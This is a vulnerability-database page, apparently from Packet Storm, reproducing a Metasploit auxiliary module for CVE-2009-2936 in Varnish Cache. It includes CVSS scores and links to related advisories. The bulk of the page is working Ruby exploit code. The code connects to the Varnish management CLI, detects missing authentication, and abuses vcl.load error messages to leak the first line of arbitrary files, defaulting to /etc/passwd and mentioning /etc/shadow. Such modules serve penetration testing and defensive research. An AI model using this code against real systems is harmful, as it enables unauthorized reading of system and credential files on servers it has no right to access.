Lucene search
Patrick, h00die, metasploit.comPACKETSTORM:180958HistoryAug 31, 2024 - 12:00 a.m.
Varnish Cache CLI File Read
2024-08-3100:00:00
patrick, h00die, metasploit.com
packetstormsecurity.com
13
metasploit
varnish cache
cli file read
authentication required
file read
error message
exploit
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
6.6
Confidence
Low
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/tcp/client'
require 'metasploit/framework/varnish/client'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Metasploit::Framework::Varnish::Client
def initialize
super(
'Name' => 'Varnish Cache CLI File Read',
'Description' => 'This module attempts to read the first line of a file by abusing the error message when
compiling a file with vcl.load.',
'References' =>
[
[ 'OSVDB', '67670' ],
[ 'CVE', '2009-2936' ],
[ 'EDB', '35581' ],
[ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ]
],
'Author' =>
[
'patrick', #original module
'h00die <[email protected]>' #updates and standardizations
],
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 6082
}
)
register_options(
[
OptString.new('PASSWORD', [ false, 'Password for CLI. No auth will be automatically detected', '' ]),
OptString.new('FILE', [ false, 'File to read the first line of', '/etc/passwd' ])
])
end
def run_host(ip)
# first check if we even need auth
begin
connect
challenge = require_auth?
close_session
disconnect
connect
if !challenge
print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: No Authentication Required"
else
if not login(datastore['PASSWORD'])
vprint_error "#{ip}:#{rport} - Unable to Login"
return
end
end
# abuse vcl.load to load a varnish config file and save it to a random variable. This will fail to give us the first line in debug message
sock.get_once
sock.puts("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} #{datastore['FILE']}")
result = sock.get_once
if result && result =~ /Line \d Pos \d+\)\n(.*)/
vprint_good($1)
else
vprint_error(result) # will say something like "Cannot open '/etc/shadow'"
end
close_session
disconnect
rescue Rex::ConnectionError, EOFError, Timeout::Error
print_error "#{ip}:#{rport} - Unable to connect"
end
end
end
`
Related
fedora
fedora
[SECURITY] Fedora 13 Update: varnish-2.1.0-2.fc13
2010-04-29 07:10:38
metasploit
metasploit
Varnish Cache CLI Login Utility
2016-11-22 03:06:20
Varnish Cache CLI File Read
2017-04-08 13:15:07
ubuntucve
ubuntucve
CVE-2009-2936
2010-04-05 00:00:00
cvelist
cvelist
CVE-2009-2936
2010-04-05 16:00:00
nvd
nvd
CVE-2009-2936
2010-04-05 16:30:00
securityvulns
securityvulns
Varnish privilege escalation
2010-03-31 00:00:00
Medium security hole in Varnish reverse proxy
2010-03-31 00:00:00
nessus
nessus
Fedora 13 : varnish-2.1.0-2.fc13 (2010-6719)
2010-07-01 00:00:00
packetstorm
packetstorm
Varnish Cache CLI Login Utility
2024-08-31 00:00:00
Varnish Cache CLI Interface Remote Code Execution
2014-12-20 00:00:00
debiancve
debiancve
CVE-2009-2936
2010-04-05 16:30:00
prion
prion
Cross site request forgery (csrf)
2010-04-05 16:30:00
attackerkb
attackerkb
CVE-2009-2936
2010-04-05 00:00:00
CVE-2007-2617
2007-05-11 00:00:00
cve
cve
CVE-2009-2936
2010-04-05 16:30:00
zdt
zdt
Varnish Cache CLI Interface Remote Code Execution Exploit
2014-12-21 00:00:00
exploitdb
exploitdb
Varnish Cache CLI Interface - Remote Code Execution (Metasploit)
2014-12-19 00:00:00
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
6.6
Confidence
Low
Related for PACKETSTORM:180958